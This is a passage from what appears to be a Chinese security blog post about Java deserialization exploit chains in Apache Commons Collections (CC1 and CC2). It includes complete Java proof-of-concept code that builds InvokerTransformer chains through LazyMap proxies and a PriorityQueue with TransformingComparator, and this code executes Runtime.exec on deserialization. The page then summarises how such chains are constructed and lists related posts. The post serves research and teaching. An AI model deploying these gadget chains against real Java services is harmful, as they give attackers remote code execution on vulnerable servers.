                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{"calc.exe"})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map<String, Object> innerMap = new HashMap<>();


        Map<String, Object> lazyMap = LazyMap.decorate(innerMap, transformerChain);



        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, lazyMap);

        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] {Map.class}, handler);
        handler = (InvocationHandler)construct.newInstance(Retention.class, proxyMap);
        String s = DeserializationTools.serializeToHex((Serializable) handler);
        System.out.println(s);

        DeserializationTools.deserializeFromHex(s);
    }
}

compare+PriorityQueue

TransformingComparator在3.1版本中并不支持序列化,但是在4.0版本支持序列化,因此切换依赖:

<dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-collections4</artifactId>
            <version>4.0</version>
        </dependency>

用静态扫描找到了几条链,然后只有以下这条可以用,其他的都无法污染compator:

被调用链 #997(节点数:5) ---
    java.util.Comparator.compare(java.util.Comparator.class:-1)
        类特性:[重写readObject][支持序列化]java.util.PriorityQueue
        java.util.PriorityQueue.siftDownUsingComparator(java.util.Comparator.class:721)
            类特性:[重写readObject][支持序列化]java.util.PriorityQueue
            java.util.PriorityQueue.siftDown(java.util.PriorityQueue.class:687)
                类特性:[重写readObject][支持序列化]java.util.PriorityQueue
                java.util.PriorityQueue.heapify(java.util.PriorityQueue.class:736)
                    类特性:[重写readObject][支持序列化]java.util.PriorityQueue
                    java.util.PriorityQueue.readObject(java.util.PriorityQueue.class:795)

构造:

package org.example.CommonsCollections;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.example.tools.DeserializationTools;
import java.io.IOException;
import java.lang.reflect.Field;
import java.util.*;


public class CommonsCollections2 {
    public static void main(String[] args) throws IOException, ClassNotFoundException, IllegalAccessException, NoSuchFieldException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{"calc.exe"})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);
        TransformingComparator comparator=new TransformingComparator(transformerChain);

        PriorityQueue priorityQueue = new PriorityQueue();
        priorityQueue.add(1);
        priorityQueue.add(1);
        Field field2 = priorityQueue.getClass().getDeclaredField("comparator");
        field2.setAccessible(true);
        field2.set(priorityQueue, comparator);

        String s = DeserializationTools.serializeToHex(priorityQueue);
        System.out.println(s);

        DeserializationTools.deserializeFromHex(s);
    }
}

总结

梳理CC链 POC:

  • Rutime + InvokerTransformer+LazyMap.get+AnnotationInvocationHandler动态代理(done)
  • Rutime + InvokerTransformer+LazyMap.get+TiedMapEntry(hashcode、toString和equal其中任意一个方法被直接或间接调用)(done)
  • TemplatesImpl+InvokerTransformer+LazyMap.get+AnnotationInvocationHandler动态代理
  • TemplatesImpl+InstantiateTransformer+LazyMap.get+AnnotationInvocationHandler动态代理
  • TemplatesImpl+InvokerTransformer+LazyMap.get+TiedMapEntry(hashcode、toString和equal其中任意一个方法被直接或间接调用)
  • TemplatesImpl+InstantiateTransformer+LazyMap.get+TiedMapEntry(hashcode、toString和equal其中任意一个方法被直接或间接调用)

CC链的POC的整体构造思路为:命令执行的底座(恶意Transform链)+危险调用链(能触发恶意Transform链)+危险调用链的序列化封装(封装为反序列化时自动触发恶意危险调用链),其中后面两部分也可以整合成从readObject(source)到触发恶意Transform的点(sink)这样一条危险的调用链,按照这个思路就可以举一反三去构造自己想要构造的反序列化利用链。

参考:

  • https://xz.aliyun.com/news/8908
  • https://www.cnblogs.com/leyilea/p/18426191
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3930
ysoserial这款工具,堪称为“java反序列利用神器”。
JMX 反序列化漏洞
蚁景网安学院
07-18 1266
前段时间看到普元 EOS Platform 爆了这个洞,Apache James,Kafka-UI 都爆了这几个洞,所以决定系统来学习一下这个漏洞点。JMX(Java Management Extensions,即 Java 管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架。
Java反序列化漏洞-CC1利用分析
柠檬i的博客
12-17 1444
Java Collections Framework 是 JDK 1.2 中的一项重要新增功能。 它添加了许多强大的数据结构,可以加速最重要的 Java 应用程序的开发。 从那时起,它已成为 Java 中公认的集合处理标准。 像许多常见的应用如Weblogic、WebSphere、Jboss、Jenkins等都使⽤了Apache Commons Collections工具库,当该工具库出现反序列化漏洞时,这些应用无一幸免。
Java反序列化漏洞-CC6利用分析
柠檬i的博客
12-26 1906
经过之前对[CC1]的分析,现在已经对反序列化利用有了初步的认识,这次来分析一个最好用的CC利用——CC6。 为什么CC6是最好用的CC利用,因为CC6不限制jdk版本,只要commons collections 小于等于3.2.1,都存在这个漏洞
java反序列化漏洞cc1学习笔记
2302_79724763的博客
11-09 1353
java反序列化漏洞cc1过程java动态代理放射学习
Java安全研究——反序列化漏洞CC
weixin_43889136的博客
04-13 4690
0x01前言 apachecommons-collections组件下的反序列化漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03反序列化漏洞 序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
JAVA反序列化漏洞-ysoserial-URLDNS分析
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-29 1174
对于进行反序列化漏洞原理的学习,URLDNS这条比较好理解,对后续学习打个基础,URLDNS也是经常用于验证Java反序列化漏洞是否存在,验证服务主机是否出网等情况,为了后期进一步有效性的利用。让我们开始学习吧!
rmi 反序列化漏洞_反序列化漏洞详解
weixin_32224617的博客
12-30 689
反序列化漏洞详解一、什么是序列化和反序列化1、序列化和反序列化序列化是将复杂的数据结构(如对象及其字段)转换为“更平坦”格式的过程这种格式可以作为连续的字节流发送和接收序列化数据使以下操作更简单: 将复杂数据写入进程间内存、文件或数据库 有效的实现多平台之间的通信、对象持久化存储 在应用程序的不同组件之间通过网络或者API调用发送复杂数据反序列化是将字节流还原为原始对象的过程2、...
Java反序列化漏洞与URLDNS利用分析
道阻且长,行则将至
06-02 2167
本文从一个实际的 Java 反序列化 Demo 出发,学习反序列化漏洞的 Source 点特征、漏洞利用的必要条件,同时分析了 URLDNS 的原理,最后总结了 Java 反序列化漏洞的防御手段。
rmi 反序列化漏洞_Java安全之RMI反序列化
weixin_35374026的博客
01-13 1324
Java安全之RMI反序列化0x00 前言在分析Fastjson漏洞前,需要了解RMI机制和JNDI注入等知识点,所以本篇文来分析一下RMI机制。在Java里面简单来说使用Java调用远程Java程序使用的就是RMI,调用C的程序调用的是JNI,调用python程序使用到的是Jython。RMI、JNI、Jython,其实在安全中都能发挥比较大的作用。 JNI在安全里面的运用就比较大了,既然可以...
Java安全研究——反序列化漏洞CC2
weixin_43889136的博客
05-10 1903
0x01
Java反序列化漏洞利用分析:CommonsCollections6(CC6)
syjshs的博客
07-26 722
CommonsCollections6(简称CC6)是基于Apache Commons Collections的一个经典Java反序列化漏洞利用。它通过和LazyMap结合,利用Java集合类的特性,在反序列化时触发一系列反射调用,最终执行任意命令。本文基于两个样例CC6Test1和CC6Test2详细解读该利用的构造过程、触发原理以及关键点,帮助读者理解和防御此类攻击。
Java反序列化漏洞利用分析:CommonsCollections1(CC1)
syjshs的博客
07-26 626
Java 反序列化漏洞利用中,CommonsCollections1(简称 CC1) 是最经典、最入门的一条利用。本文将结合CC1Test1和CC1Test2两个利用样例,从整体流程、关键类、条构造逻辑以及漏洞触发机制等多个方面,对 CC1 进行详细分析。
Java 安全反序列化漏洞 —— 所有 CC 详细讲解(一)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
05-16 1803
Java 安全反序列化漏洞 CC 全解
SSM企业物资管理系统h3109(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面
2509_93102542的博客
11-21 763
在技术实现上,国外多采用成熟的开发框架和技术架构,注重系统的安全性、稳定性和可扩展性,同时积极融入大数据、人工智能等新技术,实现物资需求预测、智能库存优化等功能。基于此,开发一套基于SSM框架的企业物资管理系统,整合部门、员工、物资及各类业务流程管理功能,实现物资管理的数字化、规范化和高效化,成为解决企业物资管理痛点的必然需求。本课题旨在开发一套基于SSM框架的企业物资管理系统,围绕部门、员工、物资信息、物资申请、消息提醒、物资归还、物资入库、意见反馈八大核心功能模块,实现企业物资管理的全流程数字化。
2025最新 SpringCloud 教程,Nacos-总结,笔记19
最新发布
Rockandrollman的博客
11-25 64
2025最新 SpringCloud 教程,Nacos-总结,笔记19
spring全局懒加载(default-lazy-init)导致的afterPropertiesSet不执行问题
豆豆的博客
11-21 525
Spring配置default-lazy-init="true"会导致所有Bean延迟初始化,影响afterPropertiesSet方法的执行时机。解决方案包括:1)为关键Bean显式设置lazy-init="false";2)使用@Lazy(false)注解;3)编程式强制初始化;4)使用DependsOn控制顺序。最佳实践建议分层配置策略,核心组件立即初始化,业务组件懒加载,并通过配置文件分离和环境区分优化配置。实际应用中,Web应用的请求处理相关Bean和批处
Java原生网络编程-BIO与NIO
照母山挖洋芋
11-24 468
摘要:本文对比了Java原生JDK中的BIO(阻塞I/O)和NIO(非阻塞I/O)网络编程模型。BIO采用"一连接一线程"模式,存在线程资源浪费和性能瓶颈问题,可通过线程池优化为伪异步I/O模型。NIO通过Selector、Channel和Buffer三大核心组件实现非阻塞通信,支持单线程管理多个通道。重点介绍了NIO的Reactor模式、事件类型(OP_READ/OP_WRITE等)及服务端/客户端的不同关注点,展示了NIO相比BIO在高并发场景下的优势。(149字)
Java集合框架实战:构建高效的企业管理系统
2402_83075343的博客
11-23 960
本文通过两个企业管理系统案例,详细解析了Java集合框架的核心应用。员工部门管理系统采用HashMap实现部门与员工的高效映射,具备智能添加、快速查询和动态统计功能;商品库存管理系统基于ArrayList实现精细化管控,包含智能录入、库存预警和价格排序等特性。文章对比了HashMap和ArrayList的特性差异,提供了集合选型的最佳实践,并探讨了系统扩展方向。这两个实战案例展示了集合框架在企业应用中的实际价值,为开发者掌握Java集合提供了实用参考。
java反序列化漏洞子有哪些
04-01
Java 反序列化漏洞是一种常见的安全问题,攻击者可以通过构造恶意输入来触发目标程序中的不安全行为。这种漏洞通常发生在应用程序对接收到的数据进行反序列化的过程中,如果数据被篡改或者包含恶意代码,则可能导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值